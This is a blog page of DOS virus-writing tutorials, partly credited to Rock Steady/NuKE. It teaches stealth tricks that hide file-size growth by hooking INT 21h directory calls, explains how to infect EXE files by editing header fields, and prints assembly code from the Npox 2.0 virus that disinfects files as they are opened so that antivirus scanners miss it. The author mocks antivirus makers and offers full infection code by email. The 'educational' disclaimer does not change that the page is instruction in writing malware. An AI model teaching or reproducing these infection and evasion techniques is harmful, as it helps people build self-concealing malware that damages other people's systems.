@ 16h ³ 2 ³ File's Time (Bits : SSSS-SMMM-MMMH-HHHH) Sec/2:Month:Year
18h ³ 2 ³ File's Date (Bits : DDDD-DMMM-MYYY-YYYY) Day:Month:Year
* 1Ah ³ 4 ³ File's Size (Word Reverse Order, Dah!!?!)
1Eh ³ 13 ³ ASCIIZ File name & Extension
* = Must be Edited by Virus is File Infected
@ = Needed to Check if File is Infected. (Seconds Field)

CONDISTION: DS:DX points to ASCIIZ of file search.
CX: Contains File Attributes

Step 1. Call Dos so it fills the DTA with its findings
Step 2. Test for CF=1 (Carry Flag) as error happened
errors happen if File not found, no more files etc...
Step 3. Get Seconds Field And UnMask Seconds
Step 4. Check if seconds = 58 (What ever your using) Quit if NOT
Notice we use `XOR AL,1Dh' rather than `CMP AL,1Dh'
Check in your ASM Bible, which is Faster? Size?
Remember speed & size is EVERYTHING, That is why
My lastest are quite small viriis for stealthness!!
Step 5. If Infected Subtract Virus Size from File
Step 6. Quit

If you want all the information about this post, kindly email me. Do some effort guys! :-)

Stealth Viruses

Stealth Viruses are the Viruses that I must admit Anti-Viral Queers Don't tend to like at all. Imagine if we added a Polymorphic feature into the Stealth Virus? But, if you want to Continue Writing Viruses you have to make them Stealth. MS-DOS Version 6.0 Now comes with Virus Scanners and CRC & Checksum Checkers. In order to stop many viruses, But it will NEVER stop the `Stealth' Virus that is SMART of those AV features!

People think that there is ALOT of more INFECTED PCs since the virus threat, started in 1986-7. Even though in the beginning only 10 or so viruses were known, they Infected more systems, Compared to the viruses today, where we have about 1300 and growing. But the truth is LESS PCs are getting infect now, as people are now Virus Aware. With all the utilities out, any joker can stop and clean a virus in seconds. Come on, how many people MEMORIZED COMMAND.COM size? Out of my head its 47845 (MS-Dos V5.0). A simple increase of size tells me I got a problem.

A simple Stealth Feature every virus MUST have is the DOS `Dir' Stealth feature. That will NOT show you the INCREASE of file size, when the virus infects it. I have played with a few routines as such. I have tried reducing the File size in the FAT area, which results in the famous CHKDSK error reports of Loss Sectors, or Cross Links... And fixing them with CHKDSK will result in damaging the file for good.

What can we do? How about reducing the File size Right AFTER its read by DOS or any Utilities and right BEFORE its display on the screen! Yeah that's an Idea, Here's how to go about it...

First we must HOOK Int 21h, as every time a `DIR' is done, Int 21h function 11h & 12h is called!
Here we go....

CONDITION: After calling Function 11h/12h (Int 21h) it will
search with the contents in the FCB. (*.*) which the DS:DX
registers point to the FCB. If successful it will DUPLICATE
the specified of the FCB in the current DTA (Disk Transfer Area)
And basically we will EDIT the info in the DTA!
NOTE: Just because we are using the DTA doesn't mean this will work for
function 4Eh/4Fh (Int 21h) that uses the DTA and ASCIIZ strings to
search, that is a different procedure, though somewhat the same as
this one. See Method #2, for that.

Step 1. We call the Int 21h so we may have the results to play with
BEFORE DOS displays them on screen.
Step 2. Get the Current PSP, As the FCB is located inside the PSP
in COM files its CS:0000 - CS:00FF. But in EXEs it can be any-
where, Int21h/AH=51 (Undocemented) will do this for us.
Step 3. Unmask the seconds (see if its infected) Quit if NOT
Step 4. Get the current DTA
Step 5. Test if it is Either an Extended FCB or Normal! If Extended
Simple add 7h to the Address. (As Extended only have 7 bytes
extra in the begining)
Step 6. Minus File size from the DTA! & Restore Time Back

That's it! I think you don't get it if you don't have an example for this routines. :-)
Just email me and I will send you a full code of this routine. Just for EDUCATIONAL purpose only.

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EXE Infections: Part 2

The first part consisted on how to Infect the EXE file, from a resident virus. However, that is only HALF the code and understanding needed for EXE infectors. The part to follow, is on how to give control back to the original EXE file. This is one part of EXE infectors, that mostly EVERY ONE tend to forget to point out. Big tickle, you know how to infect the EXE, but can you make the original EXE run after its infection? Do you know how to restore the registers we took from the EXE header? Anyhow lets get going...

If the Infected EXE file is now executed, the first Line of Code it will encounter will be the first byte of our Virus. Since CS:IP have been changed in the header (Part I) to point to our Virus. The first thing we will need to do, is set up a Variable offset, (As I call it). Basically when TASM compiles our virus, all variables and other data locations are given a FIX address. Though in the case of the Virus this is NOT GOOD as viruses, tend to append themselves, and therefore variables are never in the same location...

Later when the Virus infects a File, it will represent Fig 3. Now, when the CALL command is executed, it PUSHes into the Stacks the NEXT CS:IP so when it has to RETurn, all it has to do is POP back the CS:IP to know exactly where it left off! So we can take advantage of the command, by POPing back ourselves, thus this will give us the NEXT byte from the CALL command. which as you see, in the examples is our POP BP statement.

Example of my stealth/resident virus

However when the Virus is Freshly Compiled, all Registers values are GOOD, so that is why we must make BP=0 the first time, as the variables were set according to the sources, so no adjustment needed, though when we infect a file, this BP Variable Pointer come ALIVE!

Boy, That was the HARDEST part of that, Now if you found that simple pat yourself on the back, as that is the only `BIG' Conflict people tend to disregard or forget. So any time while you are NOT resident but infected on the file, and you are running code from the infected file just use the that BP Variable Pointer, for any data being loaded... Now lets put the routine together, along with the routine to EXECUTE the original EXE file.

You know this tutorial or information comes with the example code but if you want that code or this FULL tutorial, you must have some effort to get it. Email me of left some comments. :-)

EXE Infections: Part 1 "Infection Process"

We must admit there are HUGE amount of Lame Viruses out there. Ever wonder why so many people talk about the AIDS virus? Its a fucken over writting virus. Its HUGE in size and its written in PASCAL. Please! Have a little more respect for the virus world. What happened to that old Bulgarian Spirit? That too has died. Bulgaria isn't writting as many top viruses as it used to! Or are we in for a surprise? (USSR Kicks!)

Well to help people in advancing their Virus programming ability I will try to explain that basics in Infecting an EXE file. There are several ways to infect an EXE file. And I have tried several types. The best one I have programmed is the one you'll see. In Basic, it will infect EXEs by starting a new segment, only for the virus. This will infect EXEs overthe size of 64k, and it is alot less complicated..

Before we can begin we must know a few things, about EXEs. Let's say a .COM file has been loaded to segment address 1234:0000. When the COM fileruns its code is limited to 1234:0000 to 1234:FFFF (64k). In the other end EXE files, are basicaly several COMs in one. Where EXE files can setup DATA struct in one segment, CODE in another, and STACK in another. EXEs
can have an unlimited amount of Segments, its limitation is Memory Availablity. And the EXE file keeps track of these Segments, with an EXE header, telling DOS what segments start where, How big the file is, the amount of memory needed to run. the EXE header is the first few bytes of the EXE file. Though if you use DEBUG to load an EXE file you will notrun into the EXE header, as DEBUG uses the EXE header to load its CS:IP regesters with, the SS:SP and so on. Though you can view the EXE header with debug if you Rename that EXE file. So just do `DEBUG FILENAME.EQE' Just rename an EXE, the extension can be anything you wish, however don't
go and rename it to COM or BIN, these are reserved Extensions, and debug treats them differently, Example if you rename it to COM debug will load the IP regester as 0100h. The EXE header is Usually 28 bytes, though it is save as 32 Bytes Long. As the size of the EXE header (Offset 8) is in multiple 16 bytes, so 28 bytes will have to be covered in (16*2)! But the last 4 bytes are unused, by dos, Though Doesn't STOP a VIRUS from using it? Just a poping ideas out in the open. Anyhow this is how the EXE headerconsists, of...

(hex) (dec)
00 | 00 | Always 4D 5A. Marks this file as an .EXE file
*02 | 02 | Remainder after dividing load module's size by 512
*04 | 04 | Size of file in 512 byte pages
06 | 06 | Number of relocation table entries
@08 | 08 | Size of header in paragraphs (16 bytes)
0A | 10 | Minumum number of paragraphs required after loaded program
0C | 12 | Maximum number of paragraphs required after loaded program
*0E | 14 | (SS) Offset of Stack Segment in Load module in paragraphs
*10 | 16 | SP regester loaded with this word
12 | 18 | Negative sum (ignore overflow) of all words in file (CRC)
*14 | 20 | IP register loaded with this word
*16 | 22 | (CS) Offset of Code Segment in load module in paragraphs
18 | 24 | Offset of first relocation item.
1A | 26 | Overlay number. If no overlays used, this is 0
* = Will be Edited by our Virus
@ = Needed to help our reconstruction of the EXE header

There's a code sample on how we do our infections on EXE file but if you plan to have it, you may subscribe to our newsletter or easily email me for the whole code. But beware of the power of the codes because it works 100% on Resident Virus but for a Non-Resident Virus you must add a location pointer to have it work. I can't just write here all the information, you must have some small efforts to get it. Do you get what I mean?I'm really sucks in English. LOL.!

Disinfecting an Infected File

This tutorial was originally written by Rock Steady/NuKE and edited by me.

The BEST advantage a virus can have is `Disinfecting of Fly' as we must try to basically hide the virus as well as possible! And nowadays Anti- Virus programs are going crazy. As I remember at the time Npox 2.0 was developed it would Disinfect every file opened by F-prot and Scan and
when the Scanner found nothing and closed the file to go on to the next Npox would re-infect them. Truly can cause havoc, As a matter of fact Frisk didn't like this as I had some `Anti Fuck-Prot' routines and he added his own routine to open files by Int21h/6C00h, as Npox only
disinfected on Int21h/3Dh, however to make the virus disinfect on Int21h/6C00h, doesn't require much work, simply to take the ASCIIZ string at DS:SI and put SI into DX so we have DS:DX pointing to it, then run this routine.

The Basic idea on disinfection is this...
-For .COM files
Restore the first 3 bytes original Bytes of the program, these 3 bytes are usually somewhere inside the virus, and then simply remove the virus from the end of the .COM file! We do this by jumping to the end of the COM file and subtracting the Virus size from the File size and that new value is the original file size!

NOTE: if you write a virus that its length changes (Polymorphic) its wise to save the original Filesize to be infected before hand.

-For .EXE files & Overlays
This procedure is not different, just that if you changed CS:IP & SP:SS in the EXE header, simply restore the original values, or to save time, simple save the Original EXE header (first 1b bytes) in the virus and right that to the beginning as I did for Npox 2.0 Then Subtract yourself from the original size and cut it off!

I will now follow thru the Npox 2.0 virus routine Closely so you can understand this process.

Okay first thing you would want to do is CHECK if this is If the virus infects COMs & EXEs, do not waste your time looking thru other extensions, or for tight code you can waste your time and "HOPE" the `infection' marker will fail! Meaning if the virus uses the seconds field set to 60 (as Npox) then naturally only INFECTED files will have a time stamp of 60! And this routine is not needed...

opening_file: call check_extension ;Check for .COM extension
jnc open_file2 ;YES; Jmp & Disinfect
call check_exten_exe ;Check for .EXE extension
jnc open_file2 ;YES; Jmp & disinfect
jmp dword ptr cs:[int21] ;Other wise goto DOS

; At this point the file has an .COM or .EXE extension, so we continue

open_file2: push ax ;Save AX
mov ax,3d02h ;Ready to open
call calldos21 ;Do it!

;NOTE: its important you called Int21h YOURSELF! you CAN NOT do a "Int 21h"
;command, as the virus will intercept it, and will come to this routine
;and it will continue over and over again, Never ending l
;stack gets too big, overwrite the code and the system ja
;in about 2 seconds...
jnc open_file1 ;No Error Continue
pop ax ;restore
iret ;Exit

open_file1: push bx
push cx
push dx
push ds
mov bx,ax ;BX=File handler
mov ax,5700h ;Get file TimeStamp
call calldos21

mov al,cl ;move seconds into al
or cl,1fh ;Left just seconds
dec cx ;60 Seconds
xor al,cl ;cmp
jnz opening_exit3 ;NOT 60 seconds exit!

dec cx
mov word ptr cs:[old_time],cx ;Save
mov word ptr cs:[old_date],dx ;Save Date Stamp

mov ax,4202h ;Goto the End of File
xor cx,cx
xor dx,dx
call calldos21

mov cx,dx ;Save the filesize
mov dx,ax ;we will need it later
;to subtract the virus
push cx ;size fromit...
push dx ;Save it...

Here now we get the first 3 bytes (for com) or first 1B bytes (EXE header)in the Nuke Pox virus I save the ORIGINAL first 3 bytes of the .com at the VERY END! Since the buffer I made was 1B hex bytes, it is able to hold the EXE header or 3 .com bytes, anyhow the beginning of these
bytes are the last 1B bytes, since its at the end... figure it out where you saved your 3 bytes or exe header for your virus, or use the Npox routine...

sub dx,1Bh ;Subtract 1B bytes from
sbb cx,0 ;the filesize!
mov ax,4200h ;Now our pointer will
call calldos21 ;point to the 1B bytes
;Where the COM & EXE
;original bytes are
push cs
pop ds ;CS=DS (for exes)

mov ah,3fh ;Read them into Buffer
mov cx,1Bh ;1B bytes
mov dx,offset buffer ;to our buffer
call calldos21

humm, now we got the original bytes, all we gotta do is write them back to the file's beginning...

xor cx,cx ;Goto Beginning of File
xor dx,dx ;
mov ax,4200h
call calldos21

mov ah,40h ;Write first three bytes
mov dx,offset buffer ;our buffer
mov cx,1Bh ;1B bytes for EXEs
cmp word ptr cs:[buffer],5A4Dh
je open_exe_jmp ;if EXE file jump
mov cx,3h ;if COM write only 3 bytes
open_exe_jmp: call calldos21

We wrote the original file's data back to place, now we need to cut the virus off from the file, the virus is written at the end of the file, so all we do is set our file-pointer to EOF - Virus_Size, which gives us the original file length!

pop dx ;EOF - Virus_Size
pop cx ;to get ORIGINAL File size
sub dx,virus_size ;subtract virus size
sbb cx,0
mov ax,4200h
call calldos21

Now this is perhaps the "TRICKIEST" part, in order to "CROP" the file, atour new ptr location, what we do it use does to crop it, by writing 0 bytes to the new location, DOS will make that new location the NEW EoF and in result cutting off the virus and deleting its sector in the fat.

mov ah,40h ;Write new EOF
xor cx,cx ;Zero Bytes
call calldos21 ;doit

mov cx,word ptr cs:[old_time] ;Restore file time
mov dx,word ptr cs:[old_date] ;Restore file date
mov ax,5701h
int 21h

mov ah,3eh ;Close File
call calldos21

opening_exit3: pop ds
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21] ;Return to DOS...

ahh, the file is now Disinfected, now we safely return it to DOS and DOS may now open the file for inspection...

p/s: one in the italic form is not our's comment...


For your info, all of the information in this site is based on ASSEMBLY language in programming. If you don't know what is that, go find it yourself. I'm not teaching this language to y'all but how to manage a virus or virii. If you have all that information needed, you may continue.

Creating A Virus?

I had this in my mind a long time ago but it's so hard to get alive with this thing so I will get fully straight to you! The material is this blog is for EDUCATIONAL purpose only. I don't take any responsibilities of what you're doing with this material. If you don't agree with that, you should close this page now!

I'm sorry my English sucks!